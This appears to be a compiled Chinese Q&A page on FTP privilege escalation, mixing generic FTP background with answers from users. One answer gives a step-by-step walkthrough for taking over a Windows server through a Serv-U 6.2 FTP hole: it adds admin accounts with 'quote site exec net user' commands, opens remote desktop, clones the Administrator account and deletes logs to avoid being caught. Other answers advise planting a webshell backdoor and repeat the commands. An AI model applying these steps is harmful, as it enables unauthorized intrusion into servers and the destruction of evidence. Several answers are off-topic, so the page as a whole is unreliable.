提权ftp

⑴ 怎么在unix的ftp提权

FTP工作原理 拿下传文件为例，当你启动FTP从远程计算机拷贝文件时，你事实上启动了两个程序：一个本地机上的FTP客户程序：它向FTP服务器提出拷贝文件的请求。另一个是启动在远程计算机的上的FTP服务器程序，它响应你的请求把你指定的文件传送到你的计算机中。FTP采用“客户机/服务器”方式，用户端要在自己的本地计算机上安装FTP客户程序。FTP客户程序有字符界面和图形界面两种。字符界面的FTP的命令复杂、繁多。图形界面的FTP客户程序，操作上要简洁方便的多。 简单地说，支持FTP协议的服务器就是FTP服务器。 一般来说，用户联网的首要目的就是实现信息共享，文件传输是信息共享非常重要的一个内容之一。Internet上早期实现传输文件，并不是一件容易的事，我们知道 Internet是一个非常复杂的计算机环境，有PC，有工作站，有MAC，有大型机，据统计连接在Internet上的计算机已有上千万台，而这些计算机可能运行不同的操作系统，有运行Unix的服务器，也有运行Dos、Windows的PC机和运行MacOS的苹果机等等，而各种操作系统之间的文件交流问题，需要建立一个统一的文件传输协议，这就是所谓的FTP。基于不同的操作系统有不同的FTP应用程序，而所有这些应用程序都遵守同一种协议，这样用户就可以把自己的文件传送给别人，或者从其它的用户环境中获得文件。 与大多数Internet服务一样，FTP也是一个客户机/服务器系统。用户通过一个支持FTP协议的客户机程序，连接到在远程主机上的FTP服务器程序。用户通过客户机程序向服务器程序发出命令，服务器程序执行用户所发出的命令，并将执行的结果返回到客户机。比如说，用户发出一条命令，要求服务器向用户传送某一个文件的一份拷贝，服务器会响应这条命令，将指定文件送至用户的机器上。客户机程序代表用户接收到这个文件，将其存放在用户目录中。 在FTP的使用当中，用户经常遇到两个概念："下载"（Download）和"上载"（Upload）。"下载"文件就是从远程主机拷贝文件至自己的计算机上；"上载"文件就是将文件从自己的计算机中拷贝至远程主机上。用Internet语言来说，用户可通过客户机程序向（从）远程主机上载（下载）文件。 使用FTP时必须首先登录，在远程主机上获得相应的权限以后，方可上载或下载文件。也就是说，要想同哪一台计算机传送文件，就必须具有哪一台计算机的适当授权。换言之，除非有用户ID和口令，否则便无法传送文件。这种情况违背了Internet的开放性，Internet上的FTP主机何止千万，不可能要求每个用户在每一台主机上都拥有帐号。匿名FTP就是为解决这个问题而产生的。 当远程主机提供匿名FTP服务时，会指定某些目录向公众开放，允许匿名存取。系统中的其余目录则处于隐匿状态。作为一种安全措施，大多数匿名FTP主机都允许用户从其下载文件，而不允许用户向其上载文件，也就是说，用户可将匿名FTP主机上的所有文件全部拷贝到自己的机器上，但不能将自己机器上的任何一个文件拷贝至匿名FTP主机上。即使有些匿名FTP主机确实允许用户上载文件，用户也只能将文件上载至某一指定上载目录中。随后，系统管理员会去检查这些文件，他会将这些文件移至另一个公共下载目录中，供其他用户下载，利用这种方式，远程主机的用户得到了保护，避免了有人上载有问题的文件，如带病毒的文件。 作为一个Internet用户，可通过FTP在任何两台Internet主机之间拷贝文件。但是，实际上大多数人只有一个Internet帐户，FTP主要用于下载公共文件，例如共享软件、各公司技术支持文件等。 Internet上有成千上万台匿名FTP主机，这些主机上存放着数不清的文件，供用户免费拷贝。实际上，几乎所有类型的信息，所有类型的计算机程序都可以在Internet上找到。这是Internet吸引我们的重要原因之一。 FTP 是上传的. 简单说，上传下载文件，提高文件共享性。 微软的iis可以提供ftp服务，不过功能不强。 可以选用服务器软件有：serv-u，现在版本为7.X

⑵ ftp怎么提权拿服务器 我有ftp的弱口令和密码 小白就不要来了

并不是所有的ftp服务器都可以提权的，要具体看采用的那个ftp的版本

⑶ 如何从webshell到FTP提权

应该是一个操作平台吧

⑷ 我可以进入网站的后台，请问如何能拿到网站的FTP权限

FTP权限我个人观点有2种，
1 在后台想办法上传个后门马，例如是asp的程序，你就放个asp的网马。PHP就放PHP的马。然后利用自己的马，直接登入目录管理，也就是webshell 简称 shell
2就是直接拿下服务器，自然服务器里的所有网站程序都包括在内的，全部在你控制内。
当然，说是简单，其中涉及很多技术问题，例如，在后台中马，即使中了马有没足够的权限去控制整个ftp目录。这也就涉及到提权问题，我也只能说下简单的规程，具体看漏洞的情况。

⑸ ftp提权的问题

开始 要提权 首先得看看这里 服务器信息-组件支持 一般提权都会利用到这个
wscript.shell √ 命令行执行组件
在看看这里 开了终端了 有时候没开也会显示3389
个人爱好 提权的时候先看看有没有FTP 还有有没有开启终端的
方法比较简单 看操作 CMD里面输入命令FTP 目标地址 显示Serv-U FTP Server v6.2
有开FTP 而且是6.2版本的 有利用价值 这个让我们想到FTP的提权
连得上 说明开着 （小提示 如果没连得上有可能是改端口了 也有可能是没开 可以用扫描器扫一下）
接着上传一个ASP的提权脚本 lake大哥的 大家都熟悉吧 都英文来的
我简单说明一下就好了 Add User 这里是添加 Del User 删除
RUN提交 上面的默认不用修改 FTP user lake pass admin123 添加了
FTP帐号 lake 密码 admin123
连连 呵呵 进去了 说明添加帐户成功 接下来呢 就添加管理员帐号了 如果没开终端的话 也可以现在开
说明一下 现在添加的这个lake帐户是具有管理权限的哦 用到下面的命令
quote site exec net user shayu 83073645 /add添加用户
200 EXEC command successful (TID=33).
成功 继续添加权限
200 EXEC command successful (TID=33) OK了
服务器的3389已经被我开过了 我简单演示一下怎么开就OK了
用到一个工具AIO.exe 对了还得看看对方的机子是什么系统才好开3389 我已经事先看了
集体的是在WEBSHELL里面用CMD命令 VER 就可以知道了 没权限的话就自己传个CMD过去
现在看操作 我用工具传过去比较方便点
命令 quote site exec Aio.exe -Terminal 3389
在这里输入 不过注意下 那个是FTP下运行的命令 所以要在前面加上quote site exec这个才可以
OK 开了 在用这个命令Aio.exe -Clone Administrator Guest 83073645克隆帐户 也可以用之前的直接
登陆也可以 OK 到这里提权就完毕了 接下来的自由发挥了
走的时候别忘了擦PP咯 不然给人抓了 我可不管了 那边的是我用GUEST帐号登陆的 忽忽
清楚系统的日志掉了 可以的话 大家自己找找WEB的日志还有FTP的都要删除掉 我就不演示了
就到这里 88咯
相关命令：
Aio.exe -Clone Administrator Guest 83073645
Aio.exe -Terminal 3389
ftp提权命令:quote site exec net user shayu 83073645 /add
quote site exec net localgroup administrators shayu /add

⑹ 关于ftp的提权等问题

去论坛找吧 黑客防线或者黑鹰红客基地都有

在这里得不到好的答案

希望不要做坏事哦

⑺ FTP的提权命令是多少·

quote site exec net user 用户名 密码 /add 添加用户
quote site exec net localgroup administrators 用户名 /add

⑻ 如何在服务器上用微软自带FTP提权

微软的ftp目前没有提权的漏洞，只是在早期的2000系统的iss中有，但是早就不存在了。所以ftp提权放弃吧。限制的目录跳转只是禁止权限继承而已，还是从cmd
shell下手吧。

⑼ ftp弱口令扫描软件-ftp破解工具---一定要【绝对神速】的

非常精辟的ftp客户端。目前体积最小的FTP客户端工具。
使用8uftp
涵盖其它FTP工具功能
独家支持多线程上传，使上传速度更快更稳定。
同时支持直接上传压缩包，可在空间上直接解压。也可以在空间上压缩后直接下载压缩包。